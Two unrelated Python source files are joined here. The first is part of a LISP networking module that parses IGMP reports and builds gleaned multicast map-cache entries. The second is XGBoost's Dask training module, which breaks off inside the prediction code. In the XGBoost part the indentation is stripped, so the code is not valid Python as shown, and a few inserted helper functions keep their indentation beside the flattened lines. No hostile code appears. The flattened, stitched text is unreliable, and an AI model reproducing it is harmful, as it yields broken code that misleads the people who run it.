    if (rloc_entry == None):
        rloc_entry = lisp_rloc()
        mc.rloc_set = [rloc_entry]
        rloc_entry.priority = 253
        rloc_entry.mpriority = 255
        mc.build_best_rloc_set()

    if (rle == None):
        rle = lisp_rle(geid.print_address())
        rloc_entry.rle = rle

    if (rle_node == None):
        rle_node = lisp_rle_node()
        rle_node.rloc_name = seid_name
        rle.rle_nodes.append(rle_node)
        rle.build_forwarding_list()
        lprint("Add RLE {} from {} for gleaned EID {}".format(r, s, e))
    elif (rloc.is_exact_match(rle_node.address) == False or
        port != rle_node.translated_port):
        lprint("Changed RLE {} from {} for gleaned EID {}".format(r, s, e))

    #
    # Store or update the translated RLOC address and port.
    #
    rle_node.store_translated_rloc(rloc, port)

    #
    # Remember the group join for this source EID so IGMP state can be
    # refreshed and timed out later.
    #
    if (igmp):
        seid_str = seid.print_address()
        if (seid_str not in lisp_gleaned_groups):
            lisp_gleaned_groups[seid_str] = {}
        lisp_gleaned_groups[seid_str][group_str] = lisp_get_timestamp()

#
# lisp_remove_gleaned_multicast
#
# Remove the RLE node for a gleaned source EID from a (*, G) map-cache
# entry; remove the entry entirely when no RLE nodes remain.
#
def lisp_remove_gleaned_multicast(seid, geid):
    #
    # Lookup (*, G) entry to get the RLE.
    #
    mc = lisp_map_cache_lookup(seid, geid)
    if (mc == None): return

    rle = mc.rloc_set[0].rle
    if (rle == None): return

    seid_name = seid.print_address_no_iid()
    found = False
    for rle_node in rle.rle_nodes:
        if (rle_node.rloc_name == seid_name):
            found = True
            break

    if (found == False): return

    #
    # Remove the RLE node and rebuild the forwarding list.
    #
    rle.rle_nodes.remove(rle_node)
    rle.build_forwarding_list()

    group_str = geid.print_address()
    seid_str = seid.print_address()
    s = green("{}".format(seid_str), False)
    e = green("(*, {})".format(group_str), False)
    lprint("Gleaned EID {} RLE removed for {}".format(e, s))

    #
    # Remove the joined-group bookkeeping for this source EID.
    #
    if (seid_str in lisp_gleaned_groups):
        if (group_str in lisp_gleaned_groups[seid_str]):
            lisp_gleaned_groups[seid_str].pop(group_str)

    #
    # Remove the map-cache entry when no RLE nodes remain.
    #
    if (rle.rle_nodes == []):
        mc.delete_cache()
        lprint("Gleaned EID {} remove, no more RLEs".format(e))

#
# lisp_change_gleaned_multicast
#
# A gleaned source EID changed its RLOC or encap-port. Update every (*, G)
# entry the EID has joined.
#
def lisp_change_gleaned_multicast(seid, rloc, port):
    seid_str = seid.print_address()
    if (seid_str not in lisp_gleaned_groups): return

    for group in lisp_gleaned_groups[seid_str]:
        lisp_geid.store_address(group)
        lisp_build_gleaned_multicast(seid, lisp_geid, rloc, port, False)

#
# IGMP message type names, indexed by type value.
#
igmp_types = { 17 : "IGMP-query", 18 : "IGMPv1-report", 19 : "DVMRP",
    20 : "PIMv1", 22 : "IGMPv2-report", 23 : "IGMPv2-leave",
    30 : "mtrace-response", 31 : "mtrace-request", 34 : "IGMPv3-report" }

#
# IGMPv3 group-record type names, indexed by record-type value.
#
lisp_igmp_record_types = { 1 : "include-mode", 2 : "exclude-mode",
    3 : "change-to-include", 4 : "change-to-exclude", 5 : "allow-new-source",
    6 : "block-old-sources" }

#
# lisp_process_igmp_packet
#
# Parse an IGMP packet. Return True for queries, otherwise a (possibly
# empty) list of [source, group, join?] entries for reports and leaves.
#
def lisp_process_igmp_packet(packet):
    source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
    source = bold("from {}".format(source.print_address_no_iid()), False)

    r = bold("Receive", False)
    lprint("{} {}-byte {}, IGMP packet: {}".format(r, len(packet), source,
        lisp_format_packet(packet)))

    #
    # Jump over the IP header to the IGMP header.
    #
    header_offset = (struct.unpack("B", packet[0:1])[0] & 0x0f) * 4

    igmp = packet[header_offset::]
    igmp_type = struct.unpack("B", igmp[0:1])[0]

    #
    # Parse the group address.
    #
    group = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    group.address = socket.ntohl(struct.unpack("II", igmp[:8])[1])
    group_str = group.print_address_no_iid()

    if (igmp_type == 17):
        lprint("IGMP Query for group {}".format(group_str))
        return(True)

    supported = (igmp_type in (0x12, 0x16, 0x17, 0x22))
    if (supported == False):
        igmp_str = "{} ({})".format(igmp_type, igmp_types[igmp_type]) if \
            (igmp_type in igmp_types) else igmp_type
        lprint("IGMP type {} not supported".format(igmp_str))
        return([])

    if (len(igmp) < 8):
        lprint("IGMP message too small")
        return([])

    #
    # IGMPv1/v2 messages carry a single group.
    #
    if (igmp_type == 0x17):
        lprint("IGMPv2 leave (*, {})".format(bold(group_str, False)))
        return([[None, group_str, False]])

    if (igmp_type in (0x12, 0x16)):
        lprint("IGMPv{} join (*, {})".format(1 if (igmp_type == 0x12) \
            else 2, bold(group_str, False)))

        #
        # Suppress registration for link-local groups.
        #
        if (group_str.find("224.0.0.") != -1):
            lprint("Suppress registration for link-local groups")
        else:
            return([[None, group_str, True]])
        return([])

    #
    # This is an IGMPv3 report. The second 32-bit word holds the group
    # record count. Loop through the group records.
    #
    record_count = group.address
    igmp = igmp[8::]

    record_format = "BBHI"
    record_size = struct.calcsize(record_format)
    source_format = "I"
    source_size = struct.calcsize(source_format)
    source = lisp_address(LISP_AFI_IPV4, "", 32, 0)

    group_list = []
    for i in range(record_count):
        if (len(igmp) < record_size): return(group_list)
        record_type, auxlen, source_count, address = struct.unpack(
            record_format, igmp[:record_size])

        igmp = igmp[record_size::]

        if (record_type not in lisp_igmp_record_types):
            lprint("Invalid record type {}".format(record_type))
            continue

        record_type_str = lisp_igmp_record_types[record_type]
        source_count = socket.ntohs(source_count)
        group.address = socket.ntohl(address)
        group_str = group.print_address_no_iid()

        lprint("Record type: {}, group: {}, source-count: {}".format(
            record_type_str, group_str, source_count))

        #
        # Record types 1 (include-mode) and 5 (allow-new-source) are joins;
        # types 2 and 4 (exclude-mode) with no sources are (*, G) joins.
        #
        joinleave = False
        if (record_type in (1, 5)): joinleave = True
        if (record_type in (2, 4) and source_count == 0): joinleave = True
        j_or_l = "join" if (joinleave) else "leave"

        #
        # Suppress registration for link-local groups.
        #
        if (group_str.find("224.0.0.") != -1):
            lprint("Suppress registration for link-local groups")
            continue

        #
        # (*, G) record.
        #
        if (source_count == 0):
            group_list.append([None, group_str, joinleave])
            lprint("IGMPv3 {} (*, {})".format(bold(j_or_l, False),
                bold(group_str, False)))

        #
        # (S, G) records, one per source address.
        #
        for j in range(source_count):
            if (len(igmp) < source_size): return(group_list)
            address = struct.unpack(source_format, igmp[:source_size])[0]
            source.address = socket.ntohl(address)
            source_str = source.print_address_no_iid()
            group_list.append([source_str, group_str, joinleave])
            lprint("{} ({}, {})".format(j_or_l,
                green(source_str, False), bold(group_str, False)))
            igmp = igmp[source_size::]

    #
    # Return the list of [source, group, join?] entries.
    #
    return(group_list)
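
#
# Example (editor's sketch): a minimal IPv4+IGMPv2 membership report of the
# shape lisp_process_igmp_packet() parses. Addresses are illustrative and
# the IP/IGMP checksums are left zero for brevity.
#
def example_igmpv2_report():
    ip = struct.pack("!BBHHHBBH", 0x45, 0, 28, 0, 0, 1, 2, 0)
    ip += socket.inet_aton("10.1.1.1") + socket.inet_aton("239.1.1.1")
    igmp = struct.pack("!BBH", 0x16, 0, 0) + socket.inet_aton("239.1.1.1")
    return(ip + igmp)

#
# lisp_process_igmp_packet(example_igmpv2_report()) logs an IGMPv2 join and
# returns [[None, "239.1.1.1", True]].
#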

#
# Global used by the gleaning functions below so a group address does not
# have to be allocated per packet.
#
lisp_geid = lisp_address(LISP_AFI_IPV4, "", 32, 0)

#
# lisp_glean_map_cache
#
# Add or update a gleaned unicast map-cache entry for the source EID, then
# process any piggybacked IGMP report to build gleaned (*, G) state.
#
def lisp_glean_map_cache(seid, rloc, encap_port, igmp):

    #
    # Unicast entry first. Check for an RLOC address or encap-port change.
    #
    rloc_change = True
    mc = lisp_map_cache.lookup_cache(seid, True)
    if (mc and len(mc.rloc_set) != 0):
        mc.last_refresh_time = lisp_get_timestamp()

        rloc_entry = mc.rloc_set[0]
        cached_rloc = rloc_entry.rloc
        cached_port = rloc_entry.translated_port
        rloc_change = (cached_rloc.is_exact_match(rloc) == False or
            cached_port != encap_port)

        if (rloc_change):
            e = green(seid.print_address(), False)
            r = red(rloc.print_address_no_iid() + ":" + str(encap_port),
                False)
            lprint("Change gleaned EID {} to RLOC {}".format(e, r))
            rloc_entry.delete_from_rloc_probe_list(mc.eid, mc.group)
            lisp_change_gleaned_multicast(seid, rloc, encap_port)
    else:
        mc = lisp_mapping("", "", [])
        mc.eid.copy_address(seid)
        mc.mapping_source.copy_address(rloc)
        mc.map_cache_ttl = LISP_GLEAN_TTL
        mc.gleaned = True
        e = green(seid.print_address(), False)
        r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
        lprint("Add gleaned EID {} to map-cache with RLOC {}".format(e, r))
        mc.add_cache()

    #
    # Store a new RLOC entry when this is a new entry or an RLOC change.
    #
    if (rloc_change):
        rloc_entry = lisp_rloc()
        rloc_entry.store_translated_rloc(rloc, encap_port)
        rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
        rloc_entry.priority = 253
        rloc_entry.mpriority = 255
        mc.rloc_set = [rloc_entry]
        mc.build_best_rloc_set()

    #
    # No IGMP report piggybacked onto the data packet, all done.
    #
    if (igmp == None): return

    #
    # Process each (*, G) the gleaned source EID has joined or left.
    #
    lisp_geid.instance_id = seid.instance_id

    group_list = lisp_process_igmp_packet(igmp)
    if (type(group_list) == bool): return

    for source, group, joinleave in group_list:
        if (source != None): continue

        lisp_geid.store_address(group)
        allow, rloc_probe, igmp_query = lisp_allow_gleaning(seid, lisp_geid,
            rloc)
        if (allow == False): continue

        if (joinleave):
            lisp_build_gleaned_multicast(seid, lisp_geid, rloc, encap_port,
                True)
        else:
            lisp_remove_gleaned_multicast(seid, lisp_geid)
def lisp_is_json_telemetry(json_string):
    try:
        tele = json.loads(json_string)
        if (type(tele) != dict): return (None)
    except:
        lprint("Could not decode telemetry json: {}".format(json_string))
        return (None)
    #endtry

    if ("type" not in tele): return (None)
    if ("sub-type" not in tele): return (None)
    if (tele["type"] != "telemetry"): return (None)
    if (tele["sub-type"] != "timestamps"): return (None)
    return (tele)
#enddef
def lisp_encode_telemetry(json_string, ii="?", io="?", ei="?", eo="?"):
    tele = lisp_is_json_telemetry(json_string)
    if (tele == None): return (json_string)

    if (tele["itr-in"] == "?"): tele["itr-in"] = ii
    if (tele["itr-out"] == "?"): tele["itr-out"] = io
    if (tele["etr-in"] == "?"): tele["etr-in"] = ei
    if (tele["etr-out"] == "?"): tele["etr-out"] = eo
    json_string = json.dumps(tele)
    return (json_string)
#enddef
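
#
# A minimal illustrative sketch of the telemetry JSON the helpers above
# operate on. The timestamp strings here are made-up values.
#
def lisp_telemetry_example():
    record = json.dumps({"type": "telemetry", "sub-type": "timestamps",
        "itr-in": "?", "itr-out": "?", "etr-in": "?", "etr-out": "?"})
    record = lisp_encode_telemetry(record, ii="1700000000.1",
        io="1700000000.2")
    return (lisp_decode_telemetry(record))
#enddef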
def lisp_decode_telemetry(json_string):
    tele = lisp_is_json_telemetry(json_string)
    if (tele == None): return ({})
    return (tele)
#enddef
def lisp_telemetry_configured():
    if ("telemetry" not in lisp_json_list): return (None)

    telemetry = lisp_json_list["telemetry"].json_string
    if (lisp_is_json_telemetry(telemetry) == None): return (None)

    return (telemetry)
#enddef
def lisp_mr_or_pubsub(action):
    return (action in [LISP_SEND_MAP_REQUEST_ACTION, LISP_SEND_PUBSUB_ACTION])
#enddef
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
dask.py
|
# pylint: disable=too-many-arguments, too-many-locals
# pylint: disable=missing-class-docstring, invalid-name
# pylint: disable=too-many-lines
"""Dask extensions for distributed training. See
https://xgboost.readthedocs.io/en/latest/tutorials/dask.html for simple
tutorial. Also xgboost/demo/dask for some examples.
There are two sets of APIs in this module, one is the functional API including
``train`` and ``predict`` methods. The other is a stateful Scikit-Learn
wrapper inherited from the single-node Scikit-Learn interface.
The implementation is heavily influenced by dask_xgboost:
https://github.com/dask/dask-xgboost
"""
import platform
import logging
from collections import defaultdict
from collections.abc import Sequence
from threading import Thread
import numpy
from . import rabit
from .compat import DASK_INSTALLED
from .compat import distributed_get_worker, distributed_wait, distributed_comm
from .compat import da, dd, delayed, get_client
from .compat import sparse, scipy_sparse
from .compat import PANDAS_INSTALLED, DataFrame, Series, pandas_concat
from .compat import CUDF_concat
from .compat import lazy_isinstance
from .core import DMatrix, DeviceQuantileDMatrix, Booster, _expect, DataIter
from .training import train as worker_train
from .tracker import RabitTracker
from .sklearn import XGBModel, XGBRegressorBase, XGBClassifierBase
from .sklearn import xgboost_model_doc
try:
from distributed import Client
except ImportError:
Client = None
# Current status is considered as initial support, many features are
# not properly supported yet.
#
# TODOs:
# - Callback.
# - Label encoding.
# - CV
# - Ranking
#
# Note for developers:
# As of writing asyncio is still a new feature of Python and in depth
# documentation is rare. Best examples of various asyncio tricks are in dask
# (luckily). Classes like Client, Worker are awaitable. Some general rules
# for the implementation here:
# - Synchronous world is different from asynchronous one, and they don't
# mix well.
# - Write everything with async, then use distributed Client sync function
# to do the switch.
LOGGER = logging.getLogger('[xgboost.dask]')
def _start_tracker(host, n_workers):
"""Start Rabit tracker """
env = {'DMLC_NUM_WORKER': n_workers}
rabit_context = RabitTracker(hostIP=host, nslave=n_workers)
env.update(rabit_context.slave_envs())
rabit_context.start(n_workers)
thread = Thread(target=rabit_context.join)
thread.daemon = True
thread.start()
return env
def _assert_dask_support():
if not DASK_INSTALLED:
raise ImportError(
'Dask needs to be installed in order to use this module')
if platform.system() == 'Windows':
msg = 'Windows is not officially supported for dask/xgboost,'
msg += ' contributions are welcome.'
LOGGER.warning(msg)
class RabitContext:
'''A context controlling rabit initialization and finalization.'''
def __init__(self, args):
self.args = args
worker = distributed_get_worker()
self.args.append(
('DMLC_TASK_ID=[xgboost.dask]:' + str(worker.address)).encode())
def __enter__(self):
rabit.init(self.args)
LOGGER.debug('-------------- rabit say hello ------------------')
def __exit__(self, *args):
rabit.finalize()
LOGGER.debug('--------------- rabit say bye ------------------')
def concat(value): # pylint: disable=too-many-return-statements
'''To be replaced with dask builtin.'''
if isinstance(value[0], numpy.ndarray):
return numpy.concatenate(value, axis=0)
if scipy_sparse and isinstance(value[0], scipy_sparse.spmatrix):
return scipy_sparse.vstack(value, format='csr')
if sparse and isinstance(value[0], sparse.SparseArray):
return sparse.concatenate(value, axis=0)
if PANDAS_INSTALLED and isinstance(value[0], (DataFrame, Series)):
return pandas_concat(value, axis=0)
if lazy_isinstance(value[0], 'cudf.core.dataframe', 'DataFrame') or \
lazy_isinstance(value[0], 'cudf.core.series', 'Series'):
return CUDF_concat(value, axis=0)
if lazy_isinstance(value[0], 'cupy.core.core', 'ndarray'):
import cupy # pylint: disable=import-error
# pylint: disable=c-extension-no-member,no-member
d = cupy.cuda.runtime.getDevice()
for v in value:
d_v = v.device.id
assert d_v == d, 'Concatenating arrays on different devices.'
return cupy.concatenate(value, axis=0)
return dd.multi.concat(list(value), axis=0)
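# A quick illustrative sketch of the numpy branch of ``concat``: partitions
# are stacked row-wise into a single array. The helper name is hypothetical.
def _concat_example():
    parts = [numpy.arange(4).reshape(2, 2), numpy.arange(4).reshape(2, 2)]
    return concat(parts)  # ndarray of shape (4, 2)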
def _xgb_get_client(client):
'''Simple wrapper around testing None.'''
if not isinstance(client, (type(get_client()), type(None))):
raise TypeError(
_expect([type(get_client()), type(None)], type(client)))
ret = get_client() if client is None else client
return ret
def _get_client_workers(client):
workers = client.scheduler_info()['workers']
return workers
# From the implementation point of view, DaskDMatrix complicates a lot of
# things. A large portion of the code base is about syncing and extracting
# data from DaskDMatrix. But having an independent data structure gives us a
# chance to perform some specialized optimizations, like building histogram
# index directly.
class DaskDMatrix:
# pylint: disable=missing-docstring, too-many-instance-attributes
'''DMatrix holding references to Dask DataFrame or Dask Array. Constructing
a `DaskDMatrix` forces all lazy computation to be carried out. Wait on the
input data explicitly if you want to observe the computation triggered by
constructing the `DaskDMatrix`.
.. note::
DaskDMatrix does not repartition or move data between workers. It's
the caller's responsibility to balance the data.
.. versionadded:: 1.0.0
Parameters
----------
client: dask.distributed.Client
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
data : dask.array.Array/dask.dataframe.DataFrame
data source of DMatrix.
label: dask.array.Array/dask.dataframe.DataFrame
label used for training.
missing : float, optional
Value in the input data (e.g. `numpy.ndarray`) which should be treated
as missing. If None, defaults to np.nan.
weight : dask.array.Array/dask.dataframe.DataFrame
Weight for each instance.
feature_names : list, optional
Set names for features.
feature_types : list, optional
Set types for features
'''
def __init__(self,
client,
data,
label=None,
missing=None,
weight=None,
feature_names=None,
feature_types=None):
_assert_dask_support()
client: Client = _xgb_get_client(client)
self.feature_names = feature_names
self.feature_types = feature_types
self.missing = missing
if len(data.shape) != 2:
raise ValueError(
'Expecting 2 dimensional input, got: {shape}'.format(
shape=data.shape))
if not isinstance(data, (dd.DataFrame, da.Array)):
raise TypeError(_expect((dd.DataFrame, da.Array), type(data)))
if not isinstance(label, (dd.DataFrame, da.Array, dd.Series,
type(None))):
raise TypeError(
_expect((dd.DataFrame, da.Array, dd.Series), type(label)))
self.worker_map = None
self.has_label = label is not None
self.has_weights = weight is not None
self.is_quantile = False
self._init = client.sync(self.map_local_data,
client, data, label, weight)
def __await__(self):
return self._init.__await__()
async def map_local_data(self, client, data, label=None, weights=None):
'''Obtain references to local data.'''
def inconsistent(left, left_name, right, right_name):
msg = 'Partitions between {a_name} and {b_name} are not ' \
'consistent: {a_len} != {b_len}. ' \
'Please try to repartition/rechunk your data.'.format(
a_name=left_name, b_name=right_name, a_len=len(left),
b_len=len(right)
)
return msg
def check_columns(parts):
# x is required to be 2 dim in __init__
assert parts.ndim == 1 or parts.shape[1], 'Data should be' \
' partitioned by row. To avoid this specify the number' \
' of columns for your dask Array explicitly. e.g.' \
' chunks=(partition_size, X.shape[1])'
data = data.persist()
if label is not None:
label = label.persist()
if weights is not None:
weights = weights.persist()
# Breaking data into partitions, a trick borrowed from dask_xgboost.
# `to_delayed` downgrades high-level objects into numpy or pandas
# equivalents.
X_parts = data.to_delayed()
if isinstance(X_parts, numpy.ndarray):
check_columns(X_parts)
X_parts = X_parts.flatten().tolist()
if label is not None:
y_parts = label.to_delayed()
if isinstance(y_parts, numpy.ndarray):
check_columns(y_parts)
y_parts = y_parts.flatten().tolist()
if weights is not None:
w_parts = weights.to_delayed()
if isinstance(w_parts, numpy.ndarray):
check_columns(w_parts)
w_parts = w_parts.flatten().tolist()
parts = [X_parts]
if label is not None:
assert len(X_parts) == len(
y_parts), inconsistent(X_parts, 'X', y_parts, 'labels')
parts.append(y_parts)
if weights is not None:
assert len(X_parts) == len(
w_parts), inconsistent(X_parts, 'X', w_parts, 'weights')
parts.append(w_parts)
parts = list(map(delayed, zip(*parts)))
parts = client.compute(parts)
await distributed_wait(parts) # async wait for parts to be computed
for part in parts:
assert part.status == 'finished'
self.partition_order = {}
for i, part in enumerate(parts):
self.partition_order[part.key] = i
key_to_partition = {part.key: part for part in parts}
who_has = await client.scheduler.who_has(
keys=[part.key for part in parts])
worker_map = defaultdict(list)
for key, workers in who_has.items():
worker_map[next(iter(workers))].append(key_to_partition[key])
self.worker_map = worker_map
return self
def create_fn_args(self):
'''Create a dictionary of objects that can be pickled for function
arguments.
'''
return {'feature_names': self.feature_names,
'feature_types': self.feature_types,
'has_label': self.has_label,
'has_weights': self.has_weights,
'missing': self.missing,
'worker_map': self.worker_map,
'is_quantile': self.is_quantile}
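# Hypothetical usage sketch: constructing a DaskDMatrix from dask arrays.
# The explicit column dimension in `chunks` keeps the data partitioned by
# row, which `map_local_data` expects.
def _dask_dmatrix_example(client):
    X = da.random.random((1000, 10), chunks=(100, 10))
    y = da.random.random(1000, chunks=100)
    return DaskDMatrix(client, X, y)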
def _get_worker_x_ordered(worker_map, partition_order, worker):
list_of_parts = worker_map[worker.address]
client = get_client()
list_of_parts_value = client.gather(list_of_parts)
result = []
for i, part in enumerate(list_of_parts):
result.append((list_of_parts_value[i][0],
partition_order[part.key]))
return result
def _get_worker_parts(has_label, has_weights, worker_map, worker):
'''Get mapped parts of data in each worker from DaskDMatrix.'''
list_of_parts = worker_map[worker.address]
assert list_of_parts, 'data in ' + worker.address + ' was moved.'
assert isinstance(list_of_parts, list)
# `_get_worker_parts` is launched inside worker. In dask side
# this should be equal to `worker._get_client`.
client = get_client()
list_of_parts = client.gather(list_of_parts)
if has_label:
if has_weights:
data, labels, weights = zip(*list_of_parts)
else:
data, labels = zip(*list_of_parts)
weights = None
else:
data = [d[0] for d in list_of_parts]
labels = None
weights = None
return data, labels, weights
class DaskPartitionIter(DataIter): # pylint: disable=R0902
'''A data iterator for `DaskDeviceQuantileDMatrix`.
'''
def __init__(self, data, label=None, weight=None, base_margin=None,
label_lower_bound=None, label_upper_bound=None,
feature_names=None, feature_types=None):
self._data = data
self._labels = label
self._weights = weight
self._base_margin = base_margin
self._label_lower_bound = label_lower_bound
self._label_upper_bound = label_upper_bound
self._feature_names = feature_names
self._feature_types = feature_types
assert isinstance(self._data, Sequence)
types = (Sequence, type(None))
assert isinstance(self._labels, types)
assert isinstance(self._weights, types)
assert isinstance(self._base_margin, types)
assert isinstance(self._label_lower_bound, types)
assert isinstance(self._label_upper_bound, types)
self._iter = 0 # set iterator to 0
super().__init__()
def data(self):
'''Utility function for obtaining current batch of data.'''
return self._data[self._iter]
def labels(self):
'''Utility function for obtaining current batch of label.'''
if self._labels is not None:
return self._labels[self._iter]
return None
def weights(self):
'''Utility function for obtaining current batch of weight.'''
if self._weights is not None:
return self._weights[self._iter]
return None
def base_margins(self):
'''Utility function for obtaining current batch of base_margin.'''
if self._base_margin is not None:
return self._base_margin[self._iter]
return None
def label_lower_bounds(self):
'''Utility function for obtaining current batch of label_lower_bound.
'''
if self._label_lower_bound is not None:
return self._label_lower_bound[self._iter]
return None
def label_upper_bounds(self):
'''Utility function for obtaining current batch of label_upper_bound.
'''
if self._label_upper_bound is not None:
return self._label_upper_bound[self._iter]
return None
def reset(self):
'''Reset the iterator'''
self._iter = 0
def next(self, input_data):
'''Yield next batch of data'''
if self._iter == len(self._data):
# Return 0 when there's no more batch.
return 0
if self._feature_names:
feature_names = self._feature_names
else:
if hasattr(self.data(), 'columns'):
feature_names = self.data().columns.format()
else:
feature_names = None
input_data(data=self.data(), label=self.labels(),
weight=self.weights(), group=None,
label_lower_bound=self.label_lower_bounds(),
label_upper_bound=self.label_upper_bounds(),
feature_names=feature_names,
feature_types=self._feature_types)
self._iter += 1
return 1
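# Toy driver (illustrative only) for the callback protocol above: the
# consumer repeatedly passes a callable to ``next``, which feeds it one
# batch per call until it returns 0. ``sink`` stands in for the real
# XGBoost C API callback.
def _drain_partition_iter(it):
    batches = []
    def sink(data=None, **kwargs):
        batches.append(data)
    while it.next(sink) == 1:
        pass
    it.reset()
    return batches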
class DaskDeviceQuantileDMatrix(DaskDMatrix):
'''Specialized data type for `gpu_hist` tree method. This class is
used to reduce the memory usage by eliminating data copies.
Internally the data is merged by weighted GK sketching, so the number of
dask partitions may affect training accuracy, as each merge introduces
additional sketching error.
.. versionadded:: 1.2.0
Parameters
----------
max_bin: Number of bins for histogram construction.
'''
def __init__(self, client, data, label=None, weight=None,
missing=None,
feature_names=None,
feature_types=None,
max_bin=256):
super().__init__(client=client, data=data, label=label, weight=weight,
missing=missing,
feature_names=feature_names,
feature_types=feature_types)
self.max_bin = max_bin
self.is_quantile = True
def create_fn_args(self):
args = super().create_fn_args()
args['max_bin'] = self.max_bin
return args
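# Sketch (assumes GPU workers with cupy/cuDF-backed collections): built
# like a DaskDMatrix and intended for the `gpu_hist` tree method;
# `max_bin` should match the training parameter of the same name.
def _device_dmatrix_example(client, X, y):
    return DaskDeviceQuantileDMatrix(client, X, y, max_bin=256)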
def _create_device_quantile_dmatrix(feature_names, feature_types,
has_label,
has_weights, missing, worker_map,
max_bin):
worker = distributed_get_worker()
if worker.address not in set(worker_map.keys()):
msg = 'worker {address} has an empty DMatrix. ' \
'All workers associated with this DMatrix: {workers}'.format(
address=worker.address,
workers=set(worker_map.keys()))
LOGGER.warning(msg)
import cupy # pylint: disable=import-error
d = DeviceQuantileDMatrix(cupy.zeros((0, 0)),
feature_names=feature_names,
feature_types=feature_types,
max_bin=max_bin)
return d
data, labels, weights = _get_worker_parts(has_label, has_weights,
worker_map, worker)
it = DaskPartitionIter(data=data, label=labels, weight=weights)
dmatrix = DeviceQuantileDMatrix(it,
missing=missing,
feature_names=feature_names,
feature_types=feature_types,
nthread=worker.nthreads,
max_bin=max_bin)
return dmatrix
def _create_dmatrix(feature_names, feature_types, has_label,
has_weights, missing, worker_map):
'''Get data that local to worker from DaskDMatrix.
Returns
-------
A DMatrix object.
'''
worker = distributed_get_worker()
if worker.address not in set(worker_map.keys()):
msg = 'worker {address} has an empty DMatrix. ' \
'All workers associated with this DMatrix: {workers}'.format(
address=worker.address,
workers=set(worker_map.keys()))
LOGGER.warning(msg)
d = DMatrix(numpy.empty((0, 0)),
feature_names=feature_names,
feature_types=feature_types)
return d
data, labels, weights = _get_worker_parts(has_label, has_weights,
worker_map, worker)
data = concat(data)
if has_label:
labels = concat(labels)
else:
labels = None
if has_weights:
weights = concat(weights)
else:
weights = None
dmatrix = DMatrix(data,
labels,
weight=weights,
missing=missing,
feature_names=feature_names,
feature_types=feature_types,
nthread=worker.nthreads)
return dmatrix
def _dmatrix_from_worker_map(is_quantile, **kwargs):
if is_quantile:
return _create_device_quantile_dmatrix(**kwargs)
return _create_dmatrix(**kwargs)
async def _get_rabit_args(worker_map, client: Client):
'''Get rabit context arguments from data distribution in DaskDMatrix.'''
host = distributed_comm.get_address_host(client.scheduler.address)
env = await client.run_on_scheduler(
_start_tracker, host.strip('/:'), len(worker_map))
rabit_args = [('%s=%s' % item).encode() for item in env.items()]
return rabit_args
# train and predict methods are supposed to be "functional", which meets the
# dask paradigm. But as a side effect, the `evals_result` in single-node API
# is no longer supported since it mutates the input parameter, and it's not
# intuitive to sync the mutation result. Therefore, a dictionary containing
# evaluation history is instead returned.
async def _train_async(client, params, dtrain: DaskDMatrix,
*args, evals=(), **kwargs):
_assert_dask_support()
client: Client = _xgb_get_client(client)
if 'evals_result' in kwargs.keys():
raise ValueError(
'evals_result is not supported in dask interface.',
'The evaluation history is returned as result of training.')
workers = list(_get_client_workers(client).keys())
rabit_args = await _get_rabit_args(workers, client)
def dispatched_train(worker_addr, dtrain_ref, evals_ref):
'''Perform training on a single worker. A local function prevents pickling.
'''
LOGGER.info('Training on %s', str(worker_addr))
worker = distributed_get_worker()
with RabitContext(rabit_args):
local_dtrain = _dmatrix_from_worker_map(**dtrain_ref)
local_evals = []
if evals_ref:
for ref, name in evals_ref:
if ref['worker_map'] == dtrain_ref['worker_map']:
local_evals.append((local_dtrain, name))
continue
local_evals.append((_dmatrix_from_worker_map(**ref), name))
local_history = {}
local_param = params.copy() # just to be consistent
msg = 'Overriding `nthreads` defined in dask worker.'
if 'nthread' in local_param.keys() and \
local_param['nthread'] is not None and \
local_param['nthread'] != worker.nthreads:
msg = '`nthread` is specified. ' + msg
LOGGER.warning(msg)
elif 'n_jobs' in local_param.keys() and \
local_param['n_jobs'] is not None and \
local_param['n_jobs'] != worker.nthreads:
msg = '`n_jobs` is specified. ' + msg
LOGGER.warning(msg)
else:
local_param['nthread'] = worker.nthreads
bst = worker_train(params=local_param,
dtrain=local_dtrain,
*args,
evals_result=local_history,
evals=local_evals,
**kwargs)
ret = {'booster': bst, 'history': local_history}
if local_dtrain.num_row() == 0:
ret = None
return ret
if evals:
evals = [(e.create_fn_args(), name) for e, name in evals]
futures = client.map(dispatched_train,
workers,
[dtrain.create_fn_args()] * len(workers),
[evals] * len(workers),
pure=False,
workers=workers)
results = await client.gather(futures)
return list(filter(lambda ret: ret is not None, results))[0]
def train(client, params, dtrain, *args, evals=(), **kwargs):
'''Train XGBoost model.
.. versionadded:: 1.0.0
Parameters
----------
client: dask.distributed.Client
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
\\*\\*kwargs:
Other parameters are the same as `xgboost.train` except for
`evals_result`, which is returned as part of function return value
instead of argument.
Returns
-------
results: dict
A dictionary containing trained booster and evaluation history.
`history` field is the same as `eval_result` from `xgboost.train`.
.. code-block:: python
{'booster': xgboost.Booster,
'history': {'train': {'logloss': ['0.48253', '0.35953']},
'eval': {'logloss': ['0.480385', '0.357756']}}}
'''
_assert_dask_support()
client = _xgb_get_client(client)
return client.sync(_train_async, client, params,
dtrain=dtrain, *args, evals=evals, **kwargs)
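# Hedged end-to-end sketch: `LocalCluster` is used only for illustration;
# any distributed scheduler works the same way.
def _train_example():
    from distributed import LocalCluster
    with LocalCluster(n_workers=2) as cluster, Client(cluster) as client:
        X = da.random.random((1000, 10), chunks=(100, 10))
        y = da.random.randint(0, 2, size=1000, chunks=100)
        dtrain = DaskDMatrix(client, X, y)
        output = train(client, {'objective': 'binary:logistic'}, dtrain,
                       num_boost_round=10)
        return output['booster'], output['history']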
async def _direct_predict_impl(client, data, predict_fn):
if isinstance(data, da.Array):
predictions = await client.submit(
da.map_blocks,
predict_fn, data, False, drop_axis=1,
dtype=numpy.float32
).result()
return predictions
if isinstance(data, dd.DataFrame):
predictions = await client.submit(
dd.map_partitions,
predict_fn, data, True,
meta=dd.utils.make_meta({'prediction': 'f4'})
).result()
return predictions.iloc[:, 0]
raise TypeError('data of type: ' + str(type(data)) +
' is not supported by direct prediction')
# pylint: disable=too-many-statements
async def _predict_async(client: Client, model, data, *args,
missing=numpy.nan):
if isinstance(model, Booster):
booster = model
elif isinstance(model, dict):
booster = model['booster']
